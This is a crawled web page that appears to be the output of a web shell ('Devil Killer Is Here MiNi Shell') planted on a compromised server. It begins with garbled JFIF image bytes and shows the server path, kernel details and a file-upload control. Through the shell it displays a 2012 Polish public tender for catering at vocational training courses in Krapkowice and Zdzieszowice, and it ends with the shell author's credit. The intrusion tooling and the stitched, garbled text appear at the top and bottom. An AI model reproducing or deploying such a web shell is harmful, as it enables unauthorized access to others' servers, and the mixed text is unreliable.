JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121204/489808-N-2012.html

<p class="kh_header"><b>Krapkowice: zapewnienie usługi cateringowej dla uczestników projektu pn Wykształcenie Twoją szansą współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet 9, Działanie 9.2 - Podniesienie atrakcyjności i jakości szkolnictwa zawodowego) realizowanego przez Powiat Krapkowicki w Zespole Szkół im Jana Pawła II w Zdzieszowicach oraz w Zespole Szkół Zawodowych im. Piastów Opolskich w Krapkowicach</b><br>
<b>Numer ogłoszenia: 489808 - 2012; data zamieszczenia: 04.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Krapkowicach , ul. Kilińskiego 1, 47-303 Krapkowice, woj. opolskie, tel. 77 4074300, faks 77 4074332.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatkrapkowicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zapewnienie usługi cateringowej dla uczestników projektu pn Wykształcenie Twoją szansą współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet 9, Działanie 9.2 - Podniesienie atrakcyjności i jakości szkolnictwa zawodowego) realizowanego przez Powiat Krapkowicki w Zespole Szkół im Jana Pawła II w Zdzieszowicach oraz w Zespole Szkół Zawodowych im. Piastów Opolskich w Krapkowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zapewnienie usługi cateringowej dla uczestników projektu pn Wykształcenie Twoją szansą współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet 9, Działanie 9.2 - Podniesienie atrakcyjności i jakości szkolnictwa zawodowego) realizowanego przez Powiat Krapkowicki w Zespole Szkół im Jana Pawła II w Zdzieszowicach oraz w Zespole Szkół Zawodowych im. Piastów Opolskich w Krapkowicach. 
2.	Usługa cateringowa będzie realizowana w miejscach wskazanych przez Zamawiającego zgodnie z wykazem zajęć:
Lp.	Nazwa zadania	Przewidywana
liczba zajęć1	Maksymalna ilość
posiłków 
na poszczególnych 
zajęciach2 	Miejsce prowadzenia 
zajęć
1.	Zajęcia z doradcą zawodowym	1	gr. I - 17	Krapkowice3
		1	gr. II - 17	Zdzieszowice4
		1	gr. III - 17	Krapkowice3
		1	gr. IV - 27	Krapkowice3
2.	Zajęcia z zarządzania lokalnymi sieciami komputerowymi	8	15 (na każdych zajęciach)	Krapkowice3
3.	Zajęcia przygotowujące do egzaminu potwierdzającego kwalifikacje zawodowe - Technik Informatyk - I grupa	11	16 (na każdych zajęciach)	Zdzieszowice4
4.	Zajęcia przygotowujące do egzaminu potwierdzającego kwalifikacje zawodowe - Technik Informatyk - II grupa	9	20 (na każdych zajęciach)	Krapkowice3
5.	Zajęcia przygotowujące do egzaminu potwierdzającego kwalifikacje zawodowe - Technik Ekonomista	9	24 (na każdych zajęciach)	Krapkowice3
6.	Zajęcia przygotowujące do egzaminu potwierdzającego kwalifikacje zawodowe - Technik Handlowiec	8	17 (na każdych zajęciach)	Krapkowice3
7.	Zajęcia przygotowujące do egzaminu potwierdzającego kwalifikacje zawodowe - Technik Budownictwa	8	12 (na każdych zajęciach)	Krapkowice3
8.	Zajęcia przygotowujące do egzaminu potwierdzającego kwalifikacje zawodowe - Technik Mechanik	8	14 (na każdych zajęciach)	Krapkowice3
9.	Zajęcia przygotowujące do egzaminu potwierdzającego kwalifikacje zawodowe - Technik Logistyk	8	14 (na każdych zajęciach)	Krapkowice3
10.	Zajęcia z obsługi programu AutoCAD	20	15 (na każdych zajęciach)	Krapkowice3

1.	zajęcia w ramach projektu odbywają się zazwyczaj w różnych terminach i w zdecydowanej większości nie pokrywają się między sobą
2.	ilość posiłków na danych zajęciach jest uzależniona od frekwencji uczestników (niezwłocznie po sprawdzeniu listy obecności wykładowca telefonicznie  przekaże dostawcy informację o ilości posiłków, które należy dostarczyć na zajęcia)
3.	Zespół Szkół Zawodowych im. Piastów Opolskich w Krapkowicach, ul. Zamkowa 5
4.	Zespół Szkół im. Jana Pawła II w Zdzieszowicach, ul. Góry św. Anny 21A

3.	Liczba dni zajęć może ulec zmianie. Zamawiający ze względu na specyfikę projektu, w dniu ogłaszania postępowania nie jest w stanie określić precyzyjnie łącznej ilości posiłków.
4.	Wykonawca, w celu prawidłowej realizacji przedmiotu zamówienia, powinien zapewnić wszystkim uczestnikom usługę cateringową obejmującą:
4.1.	Dostarczenie posiłków na miejsce świadczenia usługi w jednorazowych pojemnikach wraz z jednorazowymi sztućcami,
4.2.	Obiad: Po jednym posiłku w dniu szkolenia, zgodnie z harmonogramem przedstawionym przez koordynatora projektu, przy czym każdy posiłek musi składać się z dania głównego - min. 400g. 
Przykładowe dniowe menu: 
a)	filet z kurczaka panierowany, ziemniaki, surówka, 
b)	kotlet mielony, ziemniaki, surówki
W ramach jednego tygodnia muszą być podawane niepowtarzające się posiłki w każdym dniu szkoleniowym. Obiad dla każdego uczestnika powinien zostać podawany na ciepło i w jednorazowym pojemniku z kompletem jednorazowych sztućców. Obiad powinien być dostarczony jako wyporcjowany. 
4.3.	Posiłki muszą być przygotowane z zachowaniem zasad racjonalnego żywienia, dobrze zbilansowane pod względem zawartości podstawowych składników odżywczych. Posiłki przeznaczone są dla osób w wieku 15-19 lat. 
Posiłki winny spełniać normy żywieniowe zgodne z polskimi normami żywieniowymi. 
Wykonawca zobowiązany jest do przygotowania posiłków o najwyższym standardzie na bazie produktów najwyższej jakości i bezpieczeństwem zgodnie z normami HACCP.
Jakość posiłków (w tym produktów używanych do ich sporządzenia) i procedury Wykonawcy powinny być zgodne z Ustawą z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 r., Nr 171, poz. 1225 z późn. zm.).
4.4.	Wykonawca odpowiada za transport przedmiotu zamówienia oraz podanie go zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i żywienia. 
4.5.	Usługa świadczona będzie w dni powszednie w godzinach od 13:00 do 19:00 oraz w soboty w godzinach od 9:00 do 14:00 w okresie obowiązywania umowy, zgodnie z harmonogramem zajęć.
4.6.	Zamawiający ma prawo kontroli jakości i ilości wydawanych posiłków oraz prawo odmowy zapłaty za posiłki niespełniające kryteriów jakościowych. 
4.7.	Termin i miejsce dostawy posiłków zostaną przedstawiane Wykonawcy przez Zamawiającego z wyprzedzeniem w formie miesięcznych harmonogramów. 
4.8.	Menu dla każdego harmonogramu będzie ustalane z wyprzedzeniem, wspólnie przez Wykonawcę oraz koordynatora projektu z ramienia Zamawiającego. 
4.9.	Liczba posiłków będzie zgodna z liczbą uczestników realizowanego projektu. Jeśli ulegnie ona zmniejszeniu w momencie oficjalnej rezygnacji uczestnika z udziału w projekcie, to o tym fakcie Wykonawca niezwłocznie zostanie poinformowany na piśmie. Od momentu otrzymania takiej informacji Wykonawca przygotowuje ilość posiłków zmniejszoną o uczestnika, który zrezygnował z udziału w projekcie. 
Łączna liczba posiłków będzie zgodna z liczbą uczestników w danym dniu szkoleniowym. Ostateczna ilość osób, które będą korzystały z usługi, oraz miejsce szkolenia, do którego należy dostarczyć catering, podane zostaną telefonicznie przez wykładowcę na danych zajęciach niezwłocznie po sprawdzeniu listy obecności. Od momentu otrzymania takiej informacji Wykonawca przygotowuje i dostarcza ilość posiłków zmniejszoną o liczbę nieobecnych uczestników w danym dniu szkoleniowym. 
4.10.	Wykonawca, który złoży ofertę na realizację przedmiotu zamówienia (w obu miastach tzn. Krapkowice i Zdzieszowice), musi wziąć pod uwagę fakt, że ze względu na realizację ww. projektu, zajęcia projektowe mogą odbywać się w tym samym czasie w dwóch różnych miastach. Oznacza to, że może wystąpić taka sytuacja, kiedy trzeba będzie w jednym dniu w podobnym przedziale godzinowym dostarczyć posiłki do dwóch różnych miejsc. Możliwa jest również sytuacja, kiedy w danym dniu żadna z grup nie będzie miała zajęć projektowych. 
4.11.	Płatność za usługę nastąpi po jej zrealizowaniu. Ostateczny koszt usługi uzależniony będzie od liczby uczestników korzystających z wyżywienia. Wykonawca zobowiązuje się do wykonania zestawienia miesięcznego wydawanego wyżywienia i przedłożenia miesięcznego menu wydawanych posiłków. 
4.12.	Wykonawca zobowiązany jest do przechowywania całości dokumentacji związanej z realizacją usługi do dnia 31 grudnia 2020 r. 
W przypadku kontroli Zamawiającego przez organ do tego uprawniony, Wykonawca zobowiązany jest do udostępnienia dokumentów, w tym dokumentów finansowych w związku z realizacją podpisanej na usługę umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.00.00-9, 55.32.10.00-6, 55.52.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana według formuły spełnia/nie spełnia. Spełnienie warunku jest rozumiane jako złożenie oświadczenia zgodnie z zał. nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca przedstawi, iż w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, zrealizował co najmniej dwie usługi polegające na wyżywieniu osób poza siedzibą Wykonawcy, a usługi te odpowiadają wartością przedmiotowi zamówienia. Usługi powinny być potwierdzone dokumentami potwierdzającymi, że zostały wykonane należycie np referencjami. Minimalna łączna wartość dwóch usług, które zostaną uznane przez Zamawiającego jako odpowiadające wartością przedmiotowi zamówienia wynosi 10.000,00 zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana według formuły spełnia/nie spełnia. Spełnienie warunku jest rozumiane jako złożenie oświadczenia zgodnie z zał. nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana według formuły spełnia/nie spełnia. Spełnienie warunku jest rozumiane jako złożenie oświadczenia zgodnie z zał. nr 2 do siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana według formuły spełnia/nie spełnia. Spełnienie warunku jest rozumiane jako złożenie oświadczenia zgodnie z zał. nr 2 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy w formie oryginału, poświadczonej notarialnie za zgodność z oryginałem kopii, bądź sporządzonego przez notariusza odpisu lub wyciągu z tego dokumentu - jeżeli osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszystkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej w postaci aneksu. 2. Zmiany istotnych postanowień umowy mogą dotyczyć: 1) terminu realizacji umowy, 2) warunków i terminów płatności, 3. Zmiany, o których mowa w ust. 2 mogą nastąpić jedynie w uzasadnionych przypadkach, w szczególności: 1) w zakresie określonym w ust. 2 pkt 1 i 2 w przypadku: a) wystąpienia siły wyższej przez którą strony rozumieją w szczególności katastrofę naturalną, strajk, pożar, eksplozję, wojnę, atak terrorystyczny, b) przedłużenia procedury przetargowej, c) uwarunkowań społecznych (protesty, listy, petycje, itp.) d) zmiany stanu prawnego, 2) w zakresie określonym w ust. 2 pkt 1 w przypadku przedłużenia terminu realizacji przedmiotu zamówienia z przyczyn nieprzewidzianych i niezależnych od Zamawiającego, 3) w zakresie określonym w ust. 2 pkt 2 w przypadku: zmian powszechnie obowiązujących przepisów prawa w trakcie realizacji umowy w szczególności regulacji dot. wykorzystania środków budżetowych, 4. Wnioskujący o zmianę umowy, przedkłada pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatkrapkowicki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Krapkowicach ul. Kilińskiego 1 47-303 Krapkowice pok. 115..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Krapkowicach ul. Kilińskiego 1 47-303 Krapkowice Biuro Obsługi Klienta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn Wykształcenie Twoją szansą współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet 9, Działanie 9.2 - Podniesienie atrakcyjności i jakości szkolnictwa zawodowego) realizowanego przez Powiat Krapkowicki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com